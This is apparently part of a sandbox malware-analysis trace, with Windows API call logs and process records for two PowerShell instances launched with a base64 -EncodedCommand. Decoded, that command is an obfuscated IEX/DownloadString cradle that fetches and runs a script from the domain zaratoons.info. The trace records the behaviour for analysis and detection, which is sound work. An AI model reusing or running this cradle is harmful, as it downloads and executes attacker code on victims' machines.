	[0784.276] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c77d398 | out: argp=0x1c77d398) returned 0
	[0784.276] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x378
	[0784.276] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x350
	[0784.276] ioctlsocket (in: s=0x378, cmd=-2147195266, argp=0x1c77d398 | out: argp=0x1c77d398) returned 0
	[0784.277] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c77d310, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c77d310, lpOverlapped=0x0) returned -1
	[0784.277] CoTaskMemAlloc (cb=0x204) returned 0x41a940
	[0784.277] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41a940, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.277] CoTaskMemFree (pv=0x41a940) 
	[0784.277] WSAEventSelect (s=0x4e4, hEventObject=0x4dc, lNetworkEvents=512) returned 0
	[0784.277] WSAIoctl (in: s=0x378, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c77d310, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c77d310, lpOverlapped=0x0) returned -1
	[0784.277] CoTaskMemAlloc (cb=0x204) returned 0x41a940
	[0784.277] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x41a940, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0784.277] CoTaskMemFree (pv=0x41a940) 
	[0784.277] WSAEventSelect (s=0x378, hEventObject=0x350, lNetworkEvents=512) returned 0
	[0784.294] GetAdaptersAddresses () returned 0x6f
	[0785.046] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b9592e0
	[0785.046] GetAdaptersAddresses () returned 0x0
	[0787.151] WSAConnect (in: s=0x4d4, name=0x2fd53b0*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0787.314] closesocket (s=0x4d0) returned 0
	[0788.175] EnumerateSecurityPackagesW (in: pcPackages=0x1c77d1f8, ppPackageInfo=0x1c77d1f0 | out: pcPackages=0x1c77d1f8, ppPackageInfo=0x1c77d1f0) returned 0x0
	[0788.179] lstrlenW (lpString="Negotiate") returned 9
	[0788.180] CoTaskMemAlloc (cb=0x16) returned 0x1b93c5d0
	[0788.180] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8b90, Length=0x14 | out: Destination=0x1b93c5d0) 
	[0788.180] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.180] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0788.180] CoTaskMemAlloc (cb=0x3c) returned 0x1b94ea80
	[0788.180] RtlMoveMemory (in: Destination=0x1b94ea80, Source=0x3f8ba4, Length=0x3a | out: Destination=0x1b94ea80) 
	[0788.180] CoTaskMemFree (pv=0x1b94ea80) 
	[0788.180] lstrlenW (lpString="NegoExtender") returned 12
	[0788.180] CoTaskMemAlloc (cb=0x1c) returned 0x1b942660
	[0788.181] RtlMoveMemory (in: Destination=0x1b942660, Source=0x3f8bde, Length=0x1a | out: Destination=0x1b942660) 
	[0788.181] CoTaskMemFree (pv=0x1b942660) 
	[0788.181] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0788.181] CoTaskMemAlloc (cb=0x3e) returned 0x1b94ea80
	[0788.181] RtlMoveMemory (in: Destination=0x1b94ea80, Source=0x3f8bf8, Length=0x3c | out: Destination=0x1b94ea80) 
	[0788.181] CoTaskMemFree (pv=0x1b94ea80) 
	[0788.181] lstrlenW (lpString="Kerberos") returned 8
	[0788.181] CoTaskMemAlloc (cb=0x14) returned 0x1b93c5d0
	[0788.181] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8c34, Length=0x12 | out: Destination=0x1b93c5d0) 
	[0788.181] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.181] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0788.181] CoTaskMemAlloc (cb=0x32) returned 0x1b946ea0
	[0788.181] RtlMoveMemory (in: Destination=0x1b946ea0, Source=0x3f8c46, Length=0x30 | out: Destination=0x1b946ea0) 
	[0788.181] CoTaskMemFree (pv=0x1b946ea0) 
	[0788.181] lstrlenW (lpString="NTLM") returned 4
	[0788.181] CoTaskMemAlloc (cb=0xc) returned 0x1b93c5d0
	[0788.181] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8c76, Length=0xa | out: Destination=0x1b93c5d0) 
	[0788.181] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.182] lstrlenW (lpString="NTLM Security Package") returned 21
	[0788.182] CoTaskMemAlloc (cb=0x2e) returned 0x1b946ea0
	[0788.182] RtlMoveMemory (in: Destination=0x1b946ea0, Source=0x3f8c80, Length=0x2c | out: Destination=0x1b946ea0) 
	[0788.182] CoTaskMemFree (pv=0x1b946ea0) 
	[0788.182] lstrlenW (lpString="Schannel") returned 8
	[0788.182] CoTaskMemAlloc (cb=0x14) returned 0x1b93c5d0
	[0788.182] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8cac, Length=0x12 | out: Destination=0x1b93c5d0) 
	[0788.182] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.182] lstrlenW (lpString="Schannel Security Package") returned 25
	[0788.182] CoTaskMemAlloc (cb=0x36) returned 0x1b946ea0
	[0788.182] RtlMoveMemory (in: Destination=0x1b946ea0, Source=0x3f8cbe, Length=0x34 | out: Destination=0x1b946ea0) 
	[0788.182] CoTaskMemFree (pv=0x1b946ea0) 
	[0788.182] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0788.182] CoTaskMemAlloc (cb=0x5c) returned 0x1b918ce0
	[0788.182] RtlMoveMemory (in: Destination=0x1b918ce0, Source=0x3f8cf2, Length=0x5a | out: Destination=0x1b918ce0) 
	[0788.182] CoTaskMemFree (pv=0x1b918ce0) 
	[0788.182] lstrlenW (lpString="Schannel Security Package") returned 25
	[0788.182] CoTaskMemAlloc (cb=0x36) returned 0x1b946ea0
	[0788.182] RtlMoveMemory (in: Destination=0x1b946ea0, Source=0x3f8d4c, Length=0x34 | out: Destination=0x1b946ea0) 
	[0788.183] CoTaskMemFree (pv=0x1b946ea0) 
	[0788.183] lstrlenW (lpString="WDigest") returned 7
	[0788.183] CoTaskMemAlloc (cb=0x12) returned 0x1b93c5d0
	[0788.183] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8d80, Length=0x10 | out: Destination=0x1b93c5d0) 
	[0788.183] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.183] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0788.183] CoTaskMemAlloc (cb=0x46) returned 0x1b94ea80
	[0788.183] RtlMoveMemory (in: Destination=0x1b94ea80, Source=0x3f8d90, Length=0x44 | out: Destination=0x1b94ea80) 
	[0788.183] CoTaskMemFree (pv=0x1b94ea80) 
	[0788.183] lstrlenW (lpString="TSSSP") returned 5
	[0788.183] CoTaskMemAlloc (cb=0xe) returned 0x1b93c5d0
	[0788.183] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8dd4, Length=0xc | out: Destination=0x1b93c5d0) 
	[0788.183] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.183] lstrlenW (lpString="TS Service Security Package") returned 27
	[0788.183] CoTaskMemAlloc (cb=0x3a) returned 0x1b94ea80
	[0788.183] RtlMoveMemory (in: Destination=0x1b94ea80, Source=0x3f8de0, Length=0x38 | out: Destination=0x1b94ea80) 
	[0788.183] CoTaskMemFree (pv=0x1b94ea80) 
	[0788.183] lstrlenW (lpString="pku2u") returned 5
	[0788.183] CoTaskMemAlloc (cb=0xe) returned 0x1b93c5d0
	[0788.184] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8e18, Length=0xc | out: Destination=0x1b93c5d0) 
	[0788.184] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.184] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0788.184] CoTaskMemAlloc (cb=0x30) returned 0x1b946ea0
	[0788.184] RtlMoveMemory (in: Destination=0x1b946ea0, Source=0x3f8e24, Length=0x2e | out: Destination=0x1b946ea0) 
	[0788.184] CoTaskMemFree (pv=0x1b946ea0) 
	[0788.184] lstrlenW (lpString="CREDSSP") returned 7
	[0788.184] CoTaskMemAlloc (cb=0x12) returned 0x1b93c5d0
	[0788.184] RtlMoveMemory (in: Destination=0x1b93c5d0, Source=0x3f8e52, Length=0x10 | out: Destination=0x1b93c5d0) 
	[0788.184] CoTaskMemFree (pv=0x1b93c5d0) 
	[0788.184] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0788.184] CoTaskMemAlloc (cb=0x4a) returned 0x1b9481e0
	[0788.184] RtlMoveMemory (in: Destination=0x1b9481e0, Source=0x3f8e62, Length=0x48 | out: Destination=0x1b9481e0) 
	[0788.184] CoTaskMemFree (pv=0x1b9481e0) 
	[0788.185] FreeContextBuffer (in: pvContextBuffer=0x3f8a50 | out: pvContextBuffer=0x3f8a50) returned 0x0
	[0788.192] GetCurrentProcess () returned 0xffffffffffffffff
	[0788.192] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c77ccd8 | out: TokenHandle=0x1c77ccd8*=0x4d0) returned 1
	[0788.197] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2fd9568, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c77cbe8, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c77cbd8, ptsExpiry=0x1c77cbd0 | out: phCredential=0x1c77cbd8, ptsExpiry=0x1c77cbd0) returned 0x0
	[0789.305] InitializeSecurityContextW (in: phCredential=0x1c77cde0, phContext=0x0, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c77cdd0, pOutput=0x2fdbcb0, pfContextAttr=0x1c77cdc8, ptsExpiry=0x1c77cdc0 | out: phNewContext=0x1c77cdd0, pOutput=0x2fdbcb0, pfContextAttr=0x1c77cdc8, ptsExpiry=0x1c77cdc0) returned 0x90312
	[0789.305] FreeContextBuffer (in: pvContextBuffer=0x1b927be0 | out: pvContextBuffer=0x1b927be0) returned 0x0
	[0803.344] send (s=0x4d4, buf=0x2fdbd80*, len=118, flags=0) returned 118
	[0803.346] recv (in: s=0x4d4, buf=0x2fdbd80, len=5, flags=0 | out: buf=0x2fdbd80*) returned 5
	[0803.630] recv (in: s=0x4d4, buf=0x2fdbd85, len=93, flags=0 | out: buf=0x2fdbd85*) returned 93
	[0803.631] InitializeSecurityContextW (in: phCredential=0x1c77cd00, phContext=0x1c77cfb0, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fdc090, Reserved2=0x0, phNewContext=0x1c77ccf0, pOutput=0x2fdc0b0, pfContextAttr=0x1c77cce8, ptsExpiry=0x1c77cce0 | out: phNewContext=0x1c77ccf0, pOutput=0x2fdc0b0, pfContextAttr=0x1c77cce8, ptsExpiry=0x1c77cce0) returned 0x90312
	[0803.720] recv (in: s=0x4d4, buf=0x2fdc1a0, len=5, flags=0 | out: buf=0x2fdc1a0*) returned 5
	[0803.720] recv (in: s=0x4d4, buf=0x2fdc1c5, len=2556, flags=0 | out: buf=0x2fdc1c5*) returned 2556
	[0803.720] InitializeSecurityContextW (in: phCredential=0x1c77cc30, phContext=0x1c77cee0, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fdcc98, Reserved2=0x0, phNewContext=0x1c77cc20, pOutput=0x2fdccb8, pfContextAttr=0x1c77cc18, ptsExpiry=0x1c77cc10 | out: phNewContext=0x1c77cc20, pOutput=0x2fdccb8, pfContextAttr=0x1c77cc18, ptsExpiry=0x1c77cc10) returned 0x90312
	[0803.722] recv (in: s=0x4d4, buf=0x2fdcda8, len=5, flags=0 | out: buf=0x2fdcda8*) returned 5
	[0803.722] recv (in: s=0x4d4, buf=0x2fdcdcd, len=331, flags=0 | out: buf=0x2fdcdcd*) returned 331
	[0803.722] InitializeSecurityContextW (in: phCredential=0x1c77cb60, phContext=0x1c77ce10, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fdcfe8, Reserved2=0x0, phNewContext=0x1c77cb50, pOutput=0x2fdd008, pfContextAttr=0x1c77cb48, ptsExpiry=0x1c77cb40 | out: phNewContext=0x1c77cb50, pOutput=0x2fdd008, pfContextAttr=0x1c77cb48, ptsExpiry=0x1c77cb40) returned 0x90312
	[0803.723] recv (in: s=0x4d4, buf=0x2fdd0f8, len=5, flags=0 | out: buf=0x2fdd0f8*) returned 5
	[0803.723] recv (in: s=0x4d4, buf=0x2fdd11d, len=4, flags=0 | out: buf=0x2fdd11d*) returned 4
	[0803.723] InitializeSecurityContextW (in: phCredential=0x1c77ca90, phContext=0x1c77cd40, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fdd1f8, Reserved2=0x0, phNewContext=0x1c77ca80, pOutput=0x2fdd218, pfContextAttr=0x1c77ca78, ptsExpiry=0x1c77ca70 | out: phNewContext=0x1c77ca80, pOutput=0x2fdd218, pfContextAttr=0x1c77ca78, ptsExpiry=0x1c77ca70) returned 0x90312
	[0803.733] FreeContextBuffer (in: pvContextBuffer=0x1b921cc0 | out: pvContextBuffer=0x1b921cc0) returned 0x0
	[0803.733] send (s=0x4d4, buf=0x2fdd2e8*, len=134, flags=0) returned 134
	[0803.734] recv (in: s=0x4d4, buf=0x2fdd2e8, len=5, flags=0 | out: buf=0x2fdd2e8*) returned 5
	[0803.956] recv (in: s=0x4d4, buf=0x2fdd2ed, len=1, flags=0 | out: buf=0x2fdd2ed*) returned 1
	[0803.956] InitializeSecurityContextW (in: phCredential=0x1c77c9c0, phContext=0x1c77cc70, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fdd460, Reserved2=0x0, phNewContext=0x1c77c9b0, pOutput=0x2fdd480, pfContextAttr=0x1c77c9a8, ptsExpiry=0x1c77c9a0 | out: phNewContext=0x1c77c9b0, pOutput=0x2fdd480, pfContextAttr=0x1c77c9a8, ptsExpiry=0x1c77c9a0) returned 0x90312
	[0803.980] recv (in: s=0x4d4, buf=0x2fdd570, len=5, flags=0 | out: buf=0x2fdd570*) returned 5
	[0803.981] recv (in: s=0x4d4, buf=0x2fdd595, len=48, flags=0 | out: buf=0x2fdd595*) returned 48
	[0803.981] InitializeSecurityContextW (in: phCredential=0x1c77c8f0, phContext=0x1c77cba0, pTargetName=0x2fcdf88, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2fdd698, Reserved2=0x0, phNewContext=0x1c77c8e0, pOutput=0x2fdd6b8, pfContextAttr=0x1c77c8d8, ptsExpiry=0x1c77c8d0 | out: phNewContext=0x1c77c8e0, pOutput=0x2fdd6b8, pfContextAttr=0x1c77c8d8, ptsExpiry=0x1c77c8d0) returned 0x0
	[0805.210] QueryContextAttributesW (in: phContext=0x1c77cb50, ulAttribute=0x4, pBuffer=0x2fdd7d0 | out: pBuffer=0x2fdd7d0) returned 0x0
	[0806.961] QueryContextAttributesW (in: phContext=0x1c77cb50, ulAttribute=0x5a, pBuffer=0x2fdd850 | out: pBuffer=0x2fdd850) returned 0x0
	[0806.971] QueryContextAttributesW (in: phContext=0x1c77ca00, ulAttribute=0x53, pBuffer=0x2fddba0 | out: pBuffer=0x2fddba0) returned 0x0
	[0811.408] CertDuplicateCRLContext (pCrlContext=0x1b91cd80) returned 0x1b91cd80
	[0811.412] CertDuplicateStore (hCertStore=0x447d50) returned 0x447d50
	[0811.413] CertEnumCertificatesInStore (hCertStore=0x447d50, pPrevCertContext=0x0) returned 0x1b91ce00
	[0811.413] CertDuplicateCRLContext (pCrlContext=0x1b91ce00) returned 0x1b91ce00
	[0811.414] CertEnumCertificatesInStore (hCertStore=0x447d50, pPrevCertContext=0x1b91ce00) returned 0x1b91cd80
	[0811.414] CertDuplicateCRLContext (pCrlContext=0x1b91cd80) returned 0x1b91cd80
	[0811.414] CertEnumCertificatesInStore (hCertStore=0x447d50, pPrevCertContext=0x1b91cd80) returned 0x0
	[0811.414] CertCloseStore (hCertStore=0x447d50, dwFlags=0x0) returned 1
	[0811.414] CertFreeCRLContext (pCrlContext=0x1b91cd80) returned 1
	[0812.890] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x447c80
	[0812.891] CertAddCRLLinkToStore (in: hCertStore=0x447c80, pCrlContext=0x1b91ce00, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0814.308] CertAddCRLLinkToStore (in: hCertStore=0x447c80, pCrlContext=0x1b91cd80, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0827.278] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b91cd80, pTime=0x1c77ca08, hAdditionalStore=0x447c80, pChainPara=0x1c77ca10, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c77ca00 | out: ppChainContext=0x1c77ca00) returned 1
	[0851.309] CertDuplicateCertificateChain (pChainContext=0x1cf0d250) returned 0x1cf0d250
	[0851.310] CertDuplicateCRLContext (pCrlContext=0x1b91cd80) returned 0x1b91cd80
	[0851.310] CertDuplicateCRLContext (pCrlContext=0x1cf4cf70) returned 0x1cf4cf70
	[0851.311] CertDuplicateCRLContext (pCrlContext=0x1cf4cff0) returned 0x1cf4cff0
	[0851.311] CertFreeCertificateChain (pChainContext=0x1cf0d250) 
	[0851.312] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1cf0d250, pPolicyPara=0x1c77cb88, pPolicyStatus=0x1c77cb68 | out: pPolicyStatus=0x1c77cb68) returned 1
	[0851.313] SetLastError (dwErrCode=0x0) 
	[0851.319] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1cf0d250, pPolicyPara=0x1c77cc60, pPolicyStatus=0x1c77cc48 | out: pPolicyStatus=0x1c77cc48) returned 1
	[0857.416] CertFreeCertificateChain (pChainContext=0x1cf0d250) 
	[0857.416] CertFreeCRLContext (pCrlContext=0x1b91cd80) returned 1
	[0858.473] EncryptMessage (in: phContext=0x1c77d210, fQOP=0x0, pMessage=0x2fe0448, MessageSeqNo=0x0 | out: pMessage=0x2fe0448) returned 0x0
	[0858.473] send (s=0x4d4, buf=0x2fe0188*, len=117, flags=0) returned 117
	[0859.815] setsockopt (s=0x4d4, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0859.815] recv (in: s=0x4d4, buf=0x2fe05f0, len=5, flags=0 | out: buf=0x2fe05f0) returned -1
	[0859.816] WSAEventSelect (s=0x4d4, hEventObject=0x0, lNetworkEvents=0) returned 0
	[0859.816] CoTaskMemAlloc (cb=0x204) returned 0x41b5a0
	[0859.816] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2745, dwLanguageId=0x0, lpBuffer=0x41b5a0, nSize=0x101, Arguments=0x0 | out: lpBuffer="An established connection was aborted by the software in your host machine.\r\n") returned 0x4d
	[0859.816] CoTaskMemFree (pv=0x41b5a0) 
	[0918.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c778c60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c778bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c778bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0918.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c778bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0925.326] CoTaskMemAlloc (cb=0x104) returned 0x49e790
	[0925.326] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49e790, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.326] CoTaskMemFree (pv=0x49e790) 

Thread:
	id = 1499
	os_tid = 0x1cac


Thread:
	id = 1510
	os_tid = 0x1c30


Thread:
	id = 1532
	os_tid = 0x201c

	[0752.280] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0752.284] ResetEvent (hEvent=0x390) returned 1
	[0858.648] GetSystemInfo (in: lpSystemInfo=0x1bd6da50 | out: lpSystemInfo=0x1bd6da50*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0905.430] CoUninitialize () 

Thread:
	id = 1763
	os_tid = 0x1c5c


Thread:
	id = 1764
	os_tid = 0x2048


Thread:
	id = 1854
	os_tid = 0x248c

	[0862.406] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0891.545] QueryContextAttributesW (in: phContext=0x1cdaef50, ulAttribute=0x1a, pBuffer=0x1cdaf0d0 | out: pBuffer=0x1cdaf0d0) returned 0x0
	[0905.431] DeleteSecurityContext (phContext=0x1cdae720) returned 0x0
	[0906.746] shutdown (s=0x4d4, how=2) returned 0
	[0906.746] setsockopt (s=0x4d4, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0906.746] closesocket (s=0x4d4) returned 0

Process:
	id = "59"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x238ba000"
	os_pid = "0xf20"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0x80c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 309
	os_tid = 0xf24


Thread:
	id = 328
	os_tid = 0xfe4


Thread:
	id = 335
	os_tid = 0xc50


Thread:
	id = 1293
	os_tid = 0x1d3c


Thread:
	id = 1299
	os_tid = 0x1d58


Thread:
	id = 1689
	os_tid = 0x2394


Thread:
	id = 1781
	os_tid = 0x2388


Process:
	id = "60"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2d373000"
	os_pid = "0xf2c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "12"
	os_parent_pid = "0x920"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 310
	os_tid = 0xf30

	[0570.426] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0576.663] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0576.663] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0576.663] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0576.663] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0597.864] GetVersionExW (in: lpVersionInformation=0x18dd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18dd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0597.866] GetVersionExW (in: lpVersionInformation=0x18dd00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18dd00*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0598.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
